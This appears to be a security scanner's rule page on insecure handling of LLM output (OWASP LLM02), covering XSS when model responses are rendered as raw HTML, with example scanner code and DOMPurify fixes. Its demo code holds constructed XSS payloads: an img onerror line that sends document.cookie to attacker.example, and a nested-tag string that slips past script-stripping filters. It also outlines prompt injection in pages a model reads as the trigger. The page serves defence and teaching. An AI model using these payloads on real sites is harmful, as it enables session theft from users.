Severity: HIGH | CWE-116 (Improper Encoding or Escaping of Output) | Category: AI Security
OWASP LLM02 — Insecure Output Handling
Description
LLM-generated output is treated as trusted and rendered into the page, or handed to another interpreter, without encoding or sanitization. Because anyone who can influence the model's input can steer its output, this lets an attacker get markup or script into whatever consumes the response: most commonly XSS in the browser, and code execution if the output reaches a sink such as eval, a shell, or a database query.
How Vezraa Detects It
We check how your app renders LLM output. If AI-generated content is passed to dangerouslySetInnerHTML or assigned to innerHTML without going through a sanitizer first, we flag it.
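As an illustration of the kind of check described above, here is an added example of a small source scanner that walks JSX/JS source line by line and reports HTML sinks whose argument is not wrapped in DOMPurify.sanitize(). This is example code written for this page, not Vezraa's detection logic; the regexes are a heuristic and the sample component source is constructed.

```javascript
// Added example: heuristic scanner for insecure-output-handling sinks.
// Not Vezraa's implementation; regex-based and meant to show the idea only.

// An expression is considered sanitized if it starts with DOMPurify.sanitize(
const SANITIZER = /^\s*DOMPurify\.sanitize\s*\(/;

// Each rule captures (group 1) the expression that reaches the HTML sink.
const SINK_RULES = [
  { name: 'dangerouslySetInnerHTML',
    re: /dangerouslySetInnerHTML=\{\{\s*__html:\s*([^}]+?)\s*\}\}/ },
  { name: 'innerHTML assignment',
    re: /\.(?:inner|outer)HTML\s*=\s*([^;]+)/ },
  { name: 'insertAdjacentHTML',
    // captures up to the first ')', so nested calls are truncated; fine for a heuristic
    re: /\.insertAdjacentHTML\s*\(\s*['"][^'"]*['"]\s*,\s*([^)]+?)\s*\)/ },
];

// Returns one finding per (line, sink) where the sink argument is not sanitized.
function findUnsafeSinks(source) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    for (const rule of SINK_RULES) {
      const m = rule.re.exec(text);
      if (!m) continue;
      const expr = m[1];
      if (SANITIZER.test(expr)) continue; // passes through DOMPurify.sanitize(...)
      findings.push({ line: i + 1, sink: rule.name, expr: expr.trim() });
    }
  });
  return findings;
}

// Constructed sample source: two unsafe sinks (lines 4 and 10), two safe ones (7 and 11).
const SAMPLE_SOURCE = `
import DOMPurify from 'dompurify';
function Answer({ aiResponse }) {
  return <div dangerouslySetInnerHTML={{ __html: aiResponse }} />;
}
function SafeAnswer({ aiResponse }) {
  return <div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(aiResponse) }} />;
}
function legacyRender(el, aiResponse) {
  el.innerHTML = aiResponse;
  el.insertAdjacentHTML('beforeend', DOMPurify.sanitize(aiResponse));
}
`;

// Stand-alone run: prints the two unsafe findings from the sample.
console.log(JSON.stringify(findUnsafeSinks(SAMPLE_SOURCE), null, 2));
```

A real scanner resolves the expression through the AST rather than matching text, so it can see that a value sanitized three lines earlier is safe, or that a variable named `cleanHtml` never actually went through a sanitizer; the line-based version above will miss both cases.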
Real-World Impact
An attacker does not need to compromise the model itself: a prompt injection hidden in a web page, document or message the model reads is enough to make it emit markup such as an img tag with an onerror handler. If that response is rendered as raw HTML, the script runs in the browser of every user who views it, and where responses are stored (chat history, shared transcripts) this becomes persistent XSS against all of them.
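To make this concrete, here is an added example (not code from this page) that treats two constructed model responses as what a prompt-injected assistant might return, and contrasts an ad-hoc "strip the script tags" filter with output encoding at the sink. The host name attacker.example and both payloads are placeholders constructed for the example.

```javascript
// Added example: why LLM output must be encoded at the sink, not "cleaned" with
// ad-hoc filters. Payloads and host name are constructed for illustration.

// Constructed LLM responses an attacker could cause via prompt injection.
const PAYLOADS = {
  // No <script> tag at all: an event handler on an ordinary tag is enough.
  imgOnerror:
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  // Nested tags: removing every <script></script> pair once rebuilds a script tag.
  nested:
    '<scr<script></script>ipt>alert(1)</scr<script></script>ipt>',
};

// A tempting but wrong "sanitizer": remove <script> blocks and keep the rest.
function naiveStripScripts(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Output encoding: what React does for `{value}`, and what you must do yourself
// before innerHTML when the model output is meant to be displayed as text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// True if the string still contains markup a browser could execute:
// a script tag, or any tag carrying an on* event-handler attribute.
function hasActiveMarkup(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Stand-alone run: the filter leaves both payloads live, encoding neutralizes both.
for (const [name, raw] of Object.entries(PAYLOADS)) {
  console.log(name, {
    afterNaiveStrip: naiveStripScripts(raw),
    stillDangerous: hasActiveMarkup(naiveStripScripts(raw)),
    afterEscape: escapeHtml(raw),
    dangerousAfterEscape: hasActiveMarkup(escapeHtml(raw)),
  });
}
```

The lesson is the same one the Fix Example makes: if the response is text, encode it (React does this for you when you render `{aiResponse}`); if it must be HTML, use a parser-based sanitizer such as DOMPurify rather than a regex, because the nested-tag payload above survives one pass of any filter that deletes substrings.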
Fix Example
// BAD — render raw HTML: anything the model emits becomes live DOM
<div dangerouslySetInnerHTML={{ __html: aiResponse }} />
// GOOD — sanitize first (DOMPurify needs a DOM: run it in the browser, or use a
// DOM-backed build such as isomorphic-dompurify when rendering on the server)
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(aiResponse) }} />
If the response does not have to be HTML, avoid the sink entirely and render it as text with {aiResponse}; React encodes it for you. If the model returns markdown, convert it with a renderer and still sanitize the resulting HTML. Sanitizing covers the browser sink only: output that reaches eval, a shell, or a SQL query needs the matching defence at that sink.
Affected Stacks
All LLM apps, Next.js, React